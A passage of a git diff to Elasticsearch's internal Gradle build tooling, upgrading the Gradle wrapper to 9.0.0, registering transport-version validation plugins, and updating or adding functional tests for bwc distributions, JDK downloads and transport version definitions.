serviceProvider.get().getProperties()); + project.getExtensions().add(VERSIONS_EXT, serviceProvider.get().getProperties()); } } diff --git a/build-tools-internal/build.gradle b/build-tools-internal/build.gradle index c04ba9b90d5e7..6f5dc5e0ca62c 100644 --- a/build-tools-internal/build.gradle +++ b/build-tools-internal/build.gradle @@ -220,6 +220,14 @@ gradlePlugin { id = 'elasticsearch.internal-yaml-rest-test' implementationClass = 'org.elasticsearch.gradle.internal.test.rest.InternalYamlRestTestPlugin' } + transportVersionReferencesPlugin { + id = 'elasticsearch.transport-version-references' + implementationClass = 'org.elasticsearch.gradle.internal.transport.TransportVersionReferencesPlugin' + } + transportVersionResourcesPlugin { + id = 'elasticsearch.transport-version-resources' + implementationClass = 'org.elasticsearch.gradle.internal.transport.TransportVersionResourcesPlugin' + } } } diff --git a/build-tools-internal/gradle/wrapper/gradle-wrapper.properties b/build-tools-internal/gradle/wrapper/gradle-wrapper.properties index c4a852da571d7..01450089d2c6c 100644 --- a/build-tools-internal/gradle/wrapper/gradle-wrapper.properties +++ b/build-tools-internal/gradle/wrapper/gradle-wrapper.properties @@ -1,7 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionSha256Sum=443c9c8ee2ac1ee0e11881a40f2376d79c66386264a44b24a9f8ca67e633375f -distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.2-all.zip +distributionSha256Sum=f759b8dd5204e2e3fa4ca3e73f452f087153cf81bac9561eeb854229cc2c5365 +distributionUrl=https\://services.gradle.org/distributions/gradle-9.0.0-all.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy index f7c05894d3e95..754431907ba60 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractGitAwareGradleFuncTest.groovy @@ -10,7 +10,6 @@ package org.elasticsearch.gradle.fixtures import org.apache.commons.io.FileUtils -import org.elasticsearch.gradle.internal.test.InternalAwareGradleRunner import org.gradle.testkit.runner.GradleRunner import org.junit.Rule import org.junit.rules.TemporaryFolder @@ -27,6 +26,17 @@ abstract class AbstractGitAwareGradleFuncTest extends AbstractGradleFuncTest { execute("git clone ${remoteGitRepo.absolutePath} cloned", testProjectDir.root) buildFile = new File(testProjectDir.root, 'cloned/build.gradle') settingsFile = new File(testProjectDir.root, 'cloned/settings.gradle') + versionPropertiesFile = new File(testProjectDir.root, 'cloned/build-tools-internal/version.properties') + versionPropertiesFile.text = """ + elasticsearch = 9.1.0 + lucene = 10.2.2 + + bundled_jdk_vendor = openjdk + bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 + minimumJdkVersion = 21 + minimumRuntimeJava = 21 + minimumCompilerJava = 21 + """ } File setupGitRemote() { diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy index 150f2b1130159..13d826ceffeb6 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/fixtures/AbstractRestResourcesFuncTest.groovy @@ -53,8 +53,10 @@ abstract class AbstractRestResourcesFuncTest extends AbstractGradleFuncTest { } """ - subProject(":distribution:archives:integ-test-zip") << "configurations.create('extracted')\n" - subProject(":distribution:archives:integ-test-zip") << "configurations.create('default')\n" + subProject(":distribution:archives:integ-test-zip") << """ +apply plugin: 'base' +configurations.create('extracted') +""" } void setupRestResources(List apis, List tests = [], List xpackTests = []) { diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy index 43edd15a5dcf6..eba9001ea761c 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPluginFuncTest.groovy @@ -80,11 +80,8 @@ class InternalDistributionArchiveSetupPluginFuncTest extends AbstractGradleFuncT def "registered distribution provides archives and directory variant"() { given: file('someFile.txt') << "some content" - - settingsFile << """ - include ':consumer' - include ':producer-tar' - """ + subProject("consumer") + subProject("producer-tar") buildFile << """ import org.gradle.api.artifacts.type.ArtifactTypeDefinition; @@ -154,9 +151,7 @@ class InternalDistributionArchiveSetupPluginFuncTest extends AbstractGradleFuncT def "builds extracted distribution via extractedAssemble"() { given: file('someFile.txt') << "some content" - settingsFile << """ - include ':producer-tar' - """ + subProject("producer-tar") buildFile << """ import org.gradle.api.artifacts.type.ArtifactTypeDefinition; diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy index bb100b6b23882..9a235675918c6 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionBwcSetupPluginFuncTest.groovy @@ -51,23 +51,23 @@ class InternalDistributionBwcSetupPluginFuncTest extends AbstractGitAwareGradleF assertOutputContains(result.output, "[$bwcDistVersion] > Task :distribution:archives:darwin-tar:${expectedAssembleTaskName}") where: - bwcDistVersion | bwcProject | expectedAssembleTaskName - "8.4.0" | "minor" | "extractedAssemble" - "8.3.0" | "staged" | "extractedAssemble" - "8.2.1" | "bugfix" | "extractedAssemble" - "8.1.3" | "bugfix2" | "extractedAssemble" + bwcDistVersion | bwcProject | expectedAssembleTaskName + "8.4.0" | "major1" | "extractedAssemble" + "8.3.0" | "major2" | "extractedAssemble" + "8.2.1" | "major3" | "extractedAssemble" + "8.1.3" | "major4" | "extractedAssemble" } @Unroll def "supports #platform aarch distributions"() { when: - def result = gradleRunner(":distribution:bwc:minor:buildBwc${platform.capitalize()}Aarch64Tar", + def result = gradleRunner(":distribution:bwc:major1:buildBwc${platform.capitalize()}Aarch64Tar", "-DtestRemoteRepo=" + remoteGitRepo, "-Dbwc.remote=origin", "-Dbwc.dist.version=${bwcDistVersion}-SNAPSHOT") .build() then: - result.task(":distribution:bwc:minor:buildBwc${platform.capitalize()}Aarch64Tar").outcome == TaskOutcome.SUCCESS + result.task(":distribution:bwc:major1:buildBwc${platform.capitalize()}Aarch64Tar").outcome == TaskOutcome.SUCCESS and: "assemble tasks triggered" assertOutputContains(result.output, "[$bwcDistVersion] > Task :distribution:archives:${platform}-aarch64-tar:extractedAssemble") @@ -87,7 +87,7 @@ class InternalDistributionBwcSetupPluginFuncTest extends AbstractGitAwareGradleF } dependencies { - expandedDist project(path: ":distribution:bwc:minor", configuration:"expanded-darwin-tar") + expandedDist project(path: ":distribution:bwc:major1", configuration:"expanded-darwin-tar") } tasks.register("resolveExpandedDistribution") { @@ -109,13 +109,12 @@ class InternalDistributionBwcSetupPluginFuncTest extends AbstractGitAwareGradleF .build() then: result.task(":resolveExpandedDistribution").outcome == TaskOutcome.SUCCESS - result.task(":distribution:bwc:minor:buildBwcDarwinTar").outcome == TaskOutcome.SUCCESS + result.task(":distribution:bwc:major1:buildBwcDarwinTar").outcome == TaskOutcome.SUCCESS and: "assemble task triggered" result.output.contains("[8.4.0] > Task :distribution:archives:darwin-tar:extractedAssemble") - result.output.contains("expandedRootPath /distribution/bwc/minor/build/bwc/checkout-8.x/" + + result.output.contains("expandedRootPath /distribution/bwc/major1/build/bwc/checkout-8.x/" + "distribution/archives/darwin-tar/build/install") - result.output.contains("nested folder /distribution/bwc/minor/build/bwc/checkout-8.x/" + + result.output.contains("nested folder /distribution/bwc/major1/build/bwc/checkout-8.x/" + "distribution/archives/darwin-tar/build/install/elasticsearch-8.4.0-SNAPSHOT") } - } diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy index fc5d432a9ef9a..c7643da1c73b9 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/InternalDistributionDownloadPluginFuncTest.groovy @@ -51,7 +51,7 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest def "resolves expanded bwc versions from source"() { given: internalBuild() - bwcMinorProjectSetup() + bwcMajor1ProjectSetup() buildFile << """ apply plugin: 'elasticsearch.internal-distribution-download' @@ -72,16 +72,16 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest def result = gradleRunner("setupDistro").build() then: - result.task(":distribution:bwc:minor:buildBwcExpandedTask").outcome == TaskOutcome.SUCCESS + result.task(":distribution:bwc:major1:buildBwcExpandedTask").outcome == TaskOutcome.SUCCESS result.task(":setupDistro").outcome == TaskOutcome.SUCCESS - assertExtractedDistroIsCreated("distribution/bwc/minor/build/install/elastic-distro", + assertExtractedDistroIsCreated("distribution/bwc/major1/build/install/elastic-distro", 'bwc-marker.txt') } def "fails on resolving bwc versions with no bundled jdk"() { given: internalBuild() - bwcMinorProjectSetup() + bwcMajor1ProjectSetup() buildFile << """ apply plugin: 'elasticsearch.internal-distribution-download' @@ -105,12 +105,12 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest "without a bundled JDK is not supported.") } - private void bwcMinorProjectSetup() { + private void bwcMajor1ProjectSetup() { settingsFile << """ - include ':distribution:bwc:minor' + include ':distribution:bwc:major1' """ - def bwcSubProjectFolder = testProjectDir.newFolder("distribution", "bwc", "minor") - new File(bwcSubProjectFolder, 'bwc-marker.txt') << "bwc=minor" + def bwcSubProjectFolder = testProjectDir.newFolder("distribution", "bwc", "major1") + new File(bwcSubProjectFolder, 'bwc-marker.txt') << "bwc=major1" new File(bwcSubProjectFolder, 'build.gradle') << """ apply plugin:'base' @@ -167,6 +167,11 @@ class InternalDistributionDownloadPluginFuncTest extends AbstractGradleFuncTest } } } + + tasks.named('assemble').configure { + dependsOn buildTar + } + artifacts { it.add("default", buildTar) it.add("extracted", buildExpanded) diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy index a4635a7232754..b9c0196530dfd 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/JdkDownloadPluginFuncTest.groovy @@ -33,13 +33,18 @@ class JdkDownloadPluginFuncTest extends AbstractGradleFuncTest { private static final String ADOPT_JDK_VERSION_15 = "15.0.2+7" private static final String AZUL_JDK_VERSION_8 = "8u302+b08" private static final String AZUL_8_DISTRO_VERSION = "8.56.0.23" + private static final String CATALOG_EA_VERSION = "25-ea+30" private static final String OPEN_JDK_VERSION = "12.0.1+99@123456789123456789123456789abcde" private static final Pattern JDK_HOME_LOGLINE = Pattern.compile("JDK HOME: (.*)") + def setup() { + configurationCacheCompatible = false // JDK class references configurations which break configuration cache + } + @Unroll - def "jdk #jdkVendor for #platform#suffix are downloaded and extracted"() { + def "jdk #distributionVersion #jdkVendor for #platform#suffix are downloaded and extracted"() { given: - def mockRepoUrl = urlPath(jdkVendor, jdkVersion, platform, arch); + def mockRepoUrl = urlPath(jdkVendor, jdkVersion, platform, arch, distributionVersion); def mockedContent = filebytes(jdkVendor, platform) buildFile.text = """ plugins { @@ -77,21 +82,26 @@ class JdkDownloadPluginFuncTest extends AbstractGradleFuncTest { where: platform | arch | jdkVendor | jdkVersion | distributionVersion | expectedJavaBin | suffix - "linux" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "bin/java" | "" - "linux" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "bin/java" | "" - "linux" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "bin/java" | "(old version)" - "windows" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "bin/java" | "" - "windows" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "bin/java" | "" - "windows" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "bin/java" | "(old version)" - "darwin" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "darwin" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "darwin" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "Contents/Home/bin/java" | "(old version)" - "mac" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "mac" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | null | "Contents/Home/bin/java" | "(old version)" - "darwin" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "Contents/Home/bin/java" | "" - "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | null | "bin/java" | "" - "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_11 | null | "bin/java" | "(jdk 11)" - "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_15 | null | "bin/java" | "(jdk 15)" + "linux" | "aarch64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "bin/java" | "" + "linux" | "x64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "bin/java" | "" + "darwin" | "aarch64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "Contents/Home/bin/java" | "" + "darwin" | "x64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "Contents/Home/bin/java" | "" + "windows" | "x64" | VENDOR_OPENJDK | CATALOG_EA_VERSION | "ea" | "bin/java" | "" + "linux" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "bin/java" | "" + "linux" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "bin/java" | "" + "linux" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "bin/java" | "(old version)" + "windows" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "bin/java" | "" + "windows" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "bin/java" | "" + "windows" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "bin/java" | "(old version)" + "darwin" | "x64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "darwin" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "darwin" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "Contents/Home/bin/java" | "(old version)" + "mac" | "x64" | VENDOR_OPENJDK | OPEN_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "mac" | "x64" | VENDOR_OPENJDK | OPENJDK_VERSION_OLD | "" | "Contents/Home/bin/java" | "(old version)" + "darwin" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "Contents/Home/bin/java" | "" + "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION | "" | "bin/java" | "" + "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_11 | "" | "bin/java" | "(jdk 11)" + "linux" | "aarch64" | VENDOR_ADOPTIUM | ADOPT_JDK_VERSION_15 | "" | "bin/java" | "(jdk 15)" "darwin" | "aarch64" | VENDOR_ZULU | AZUL_JDK_VERSION_8 | AZUL_8_DISTRO_VERSION | "Contents/Home/bin/java" | "(jdk 8)" } @@ -214,13 +224,19 @@ class JdkDownloadPluginFuncTest extends AbstractGradleFuncTest { private static String urlPath(final String vendor, final String version, final String platform, - final String arch = 'x64') { - if (vendor.equals(VENDOR_ADOPTIUM)) { + final String arch = 'x64', + final String distributedVersion = '') { + final boolean isOld = version.equals(OPENJDK_VERSION_OLD); + + if (distributedVersion.equals("ea")) { + def effectivePlatform = isMac(platform) ? "macos" : platform; + def fileExtension = platform.toLowerCase().equals("windows") ? "zip" : "tar.gz"; + return "/jdks/openjdk/25/openjdk-${version}/openjdk-${version}_$effectivePlatform-${arch}_bin.$fileExtension"; + } else if (vendor.equals(VENDOR_ADOPTIUM)) { final String module = isMac(platform) ? "mac" : platform; return "/jdk-" + version + "/" + module + "/${arch}/jdk/hotspot/normal/adoptium"; } else if (vendor.equals(VENDOR_OPENJDK)) { final String effectivePlatform = isMac(platform) ? "macos" : platform; - final boolean isOld = version.equals(OPENJDK_VERSION_OLD); final String versionPath = isOld ? "jdk1/99" : "jdk12.0.1/123456789123456789123456789abcde/99"; final String filename = "openjdk-" + (isOld ? "1" : "12.0.1") + "_" + effectivePlatform + "-x64_bin." + extension(platform); return "/java/GA/" + versionPath + "/GPL/" + filename; diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy index 57ba6a7773d50..c85a3042acbd7 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTarFuncTest.groovy @@ -9,7 +9,8 @@ package org.elasticsearch.gradle.internal -import spock.lang.Ignore + +import spock.lang.Unroll import org.apache.commons.compress.archivers.tar.TarArchiveEntry import org.apache.commons.compress.archivers.tar.TarArchiveInputStream @@ -17,7 +18,6 @@ import org.apache.commons.compress.compressors.bzip2.BZip2CompressorInputStream import org.apache.commons.compress.compressors.gzip.GzipCompressorInputStream import org.elasticsearch.gradle.fixtures.AbstractGradleFuncTest import org.gradle.api.GradleException -import spock.lang.Unroll import java.nio.file.Files import java.nio.file.Path @@ -66,8 +66,12 @@ tasks.register("buildBZip2Tar", SymbolicLinkPreservingTar) { SymbolicLinkPreserv from fileTree("archiveRoot") into('config') { - dirMode 0750 - fileMode 0660 + dirPermissions { + unix(0750) + } + filePermissions { + unix(0660) + } from "real-folder2" } } @@ -118,8 +122,10 @@ tasks.register("buildTar", SymbolicLinkPreservingTar) { SymbolicLinkPreservingTa preserverTimestamp << [true, false] } - private boolean assertTar(final File archive, final Function wrapper, boolean preserveFileTimestamps) - throws IOException { + private boolean assertTar(final File archive, + final Function wrapper, + boolean preserveFileTimestamps) + throws IOException { try (TarArchiveInputStream tar = new TarArchiveInputStream(wrapper.apply(new FileInputStream(archive)))) { TarArchiveEntry entry = tar.getNextTarEntry(); boolean realFolderEntry = false; @@ -132,7 +138,7 @@ tasks.register("buildTar", SymbolicLinkPreservingTar) { SymbolicLinkPreservingTa if (entry.getName().equals("real-folder/")) { assert entry.isDirectory() realFolderEntry = true - } else if (entry.getName().equals("real-folder/file")) { + } else if (entry.getName().equals("real-folder/file")) { assert entry.isFile() fileEntry = true } else if (entry.getName().equals("real-folder/link-to-file")) { @@ -145,7 +151,7 @@ tasks.register("buildTar", SymbolicLinkPreservingTar) { SymbolicLinkPreservingTa } else if (entry.getName().equals("config/sub/")) { assert entry.isDirectory() assert entry.getMode() == 16872 - }else if (entry.getName().equals("link-in-folder/")) { + } else if (entry.getName().equals("link-in-folder/")) { assert entry.isDirectory() linkInFolderEntry = true } else if (entry.getName().equals("link-in-folder/link-to-file")) { diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy index 15b057a05e039..2d08f34e16f03 100644 --- a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/test/rest/LegacyYamlRestCompatTestPluginFuncTest.groovy @@ -40,7 +40,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe given: internalBuild() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -61,11 +61,11 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe result.task(transformTask).outcome == TaskOutcome.NO_SOURCE } - def "yamlRestCompatTest executes and copies api and transforms tests from :bwc:minor"() { + def "yamlRestCompatTest executes and copies api and transforms tests from :bwc:major1"() { given: internalBuild() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -98,8 +98,8 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe String api = "foo.json" String test = "10_basic.yml" //add the compatible test and api files, these are the prior version's normal yaml rest tests - file("distribution/bwc/minor/checkoutDir/rest-api-spec/src/main/resources/rest-api-spec/api/" + api) << "" - file("distribution/bwc/minor/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/" + test) << "" + file("distribution/bwc/major1/checkoutDir/rest-api-spec/src/main/resources/rest-api-spec/api/" + api) << "" + file("distribution/bwc/major1/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/" + test) << "" when: def result = gradleRunner("yamlRestCompatTest").build() @@ -145,7 +145,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe given: internalBuild() withVersionCatalogue() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -186,7 +186,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe given: internalBuild() - subProject(":distribution:bwc:minor") << """ + subProject(":distribution:bwc:major1") << """ configurations { checkout } artifacts { checkout(new File(projectDir, "checkoutDir")) @@ -230,7 +230,7 @@ class LegacyYamlRestCompatTestPluginFuncTest extends AbstractRestResourcesFuncTe setupRestResources([], []) - file("distribution/bwc/minor/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/test.yml" ) << """ + file("distribution/bwc/major1/checkoutDir/src/yamlRestTest/resources/rest-api-spec/test/test.yml" ) << """ "one": - do: do_.some.key_to_replace: diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/AbstractTransportVersionFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/AbstractTransportVersionFuncTest.groovy new file mode 100644 index 0000000000000..5c63de1701c4f --- /dev/null +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/AbstractTransportVersionFuncTest.groovy @@ -0,0 +1,127 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport + +import org.elasticsearch.gradle.fixtures.AbstractGradleFuncTest +import org.gradle.testkit.runner.BuildResult +import org.gradle.testkit.runner.TaskOutcome + +class AbstractTransportVersionFuncTest extends AbstractGradleFuncTest { + def javaResource(String project, String path, String content) { + file("${project}/src/main/resources/${path}").withWriter { writer -> + writer << content + } + } + + def javaSource(String project, String packageName, String className, String imports, String content) { + String packageSlashes = packageName.replace('.', '/') + file("${project}/src/main/java/${packageSlashes}/${className}.java").withWriter { writer -> + writer << """ + package ${packageName}; + ${imports} + public class ${className} { + ${content} + } + """ + } + } + + def referableTransportVersion(String name, String ids) { + javaResource("myserver", "transport/definitions/referable/" + name + ".csv", ids) + } + + def unreferableTransportVersion(String name, String id) { + javaResource("myserver", "transport/definitions/unreferable/" + name + ".csv", id) + } + + def referableAndReferencedTransportVersion(String name, String ids) { + return referableAndReferencedTransportVersion(name, ids, "Test${name.capitalize()}") + } + + def referableAndReferencedTransportVersion(String name, String ids, String classname) { + javaSource("myserver", "org.elasticsearch", classname, "", """ + static final TransportVersion usage = TransportVersion.fromName("${name}"); + """) + referableTransportVersion(name, ids) + } + + def transportVersionUpperBound(String branch, String name, String id) { + javaResource("myserver", "transport/upper_bounds/" + branch + ".csv","${name},${id}") + } + + def validateReferencesFails(String project) { + return gradleRunner(":${project}:validateTransportVersionReferences").buildAndFail() + } + + def validateResourcesFails() { + return gradleRunner(":myserver:validateTransportVersionResources").buildAndFail() + } + + def assertValidateReferencesFailure(BuildResult result, String project, String expectedOutput) { + result.task(":${project}:validateTransportVersionReferences").outcome == TaskOutcome.FAILED + assertOutputContains(result.output, expectedOutput) + } + + def assertValidateResourcesFailure(BuildResult result, String expectedOutput) { + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.FAILED + assertOutputContains(result.output, expectedOutput) + } + + def setup() { + configurationCacheCompatible = false + internalBuild() + settingsFile << """ + include ':myserver' + include ':myplugin' + """ + + file("myserver/build.gradle") << """ + apply plugin: 'java-library' + apply plugin: 'elasticsearch.transport-version-references' + apply plugin: 'elasticsearch.transport-version-resources' + """ + referableTransportVersion("existing_91", "8012000") + referableTransportVersion("existing_92", "8123000,8012001") + unreferableTransportVersion("initial_9_0_0", "8000000") + transportVersionUpperBound("9.2", "existing_92", "8123000") + transportVersionUpperBound("9.1", "existing_92", "8012001") + // a mock version of TransportVersion, just here so we can compile Dummy.java et al + javaSource("myserver", "org.elasticsearch", "TransportVersion", "", """ + public static TransportVersion fromName(String name) { + return null; + } + """) + javaSource("myserver", "org.elasticsearch", "Dummy", "", """ + static final TransportVersion existing91 = TransportVersion.fromName("existing_91"); + static final TransportVersion existing92 = TransportVersion.fromName("existing_92"); + """) + + file("myplugin/build.gradle") << """ + apply plugin: 'java-library' + apply plugin: 'elasticsearch.transport-version-references' + + dependencies { + implementation project(":myserver") + } + """ + + setupLocalGitRepo() + execute("git checkout -b main") + execute("git checkout -b test") + } + + void setupLocalGitRepo() { + execute("git init") + execute('git config user.email "build-tool@elastic.co"') + execute('git config user.name "Build tool"') + execute("git add .") + execute('git commit -m "Initial"') + } +} diff --git a/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/TransportVersionValidationFuncTest.groovy b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/TransportVersionValidationFuncTest.groovy new file mode 100644 index 0000000000000..36be4c4d94bff --- /dev/null +++ b/build-tools-internal/src/integTest/groovy/org/elasticsearch/gradle/internal/transport/TransportVersionValidationFuncTest.groovy @@ -0,0 +1,255 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.transport + + +import org.gradle.testkit.runner.TaskOutcome + +class TransportVersionValidationFuncTest extends AbstractTransportVersionFuncTest { + + def "test setup works"() { + when: + def result = gradleRunner("validateTransportVersionResources", "validateTransportVersionReferences").build() + then: + result.task(":myserver:validateTransportVersionResources").outcome == TaskOutcome.SUCCESS + result.task(":myserver:validateTransportVersionReferences").outcome == TaskOutcome.SUCCESS + result.task(":myplugin:validateTransportVersionReferences").outcome == TaskOutcome.SUCCESS + } + + def "definitions must be referenced"() { + given: + javaSource("myplugin", "org.elasticsearch.plugin", "MyPlugin", + "import org.elasticsearch.TransportVersion;", """ + static final TransportVersion dne = TransportVersion.fromName("dne"); + """) + when: + def result = validateReferencesFails("myplugin") + then: + assertValidateReferencesFailure(result, "myplugin", "TransportVersion.fromName(\"dne\") was used at " + + "org.elasticsearch.plugin.MyPlugin line 6, but lacks a transport version definition.") + } + + def "references must be defined"() { + given: + referableTransportVersion("not_used", "1000000") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/not_used.csv] is not referenced") + } + + def "names must be lowercase alphanum or underscore"() { + given: + referableAndReferencedTransportVersion("${name}", "8100000", "TestNames") + when: + def result = validateResourcesFails() + then: + assertValidateResourcesFailure(result, "Transport version definition file " + + "[myserver/src/main/resources/transport/definitions/referable/${name}.csv] does not have a valid name, " + + "must be lowercase alphanumeric and underscore") + + where: + name << ["CapitalTV", "spaces tv", "trailing_spaces_tv ", 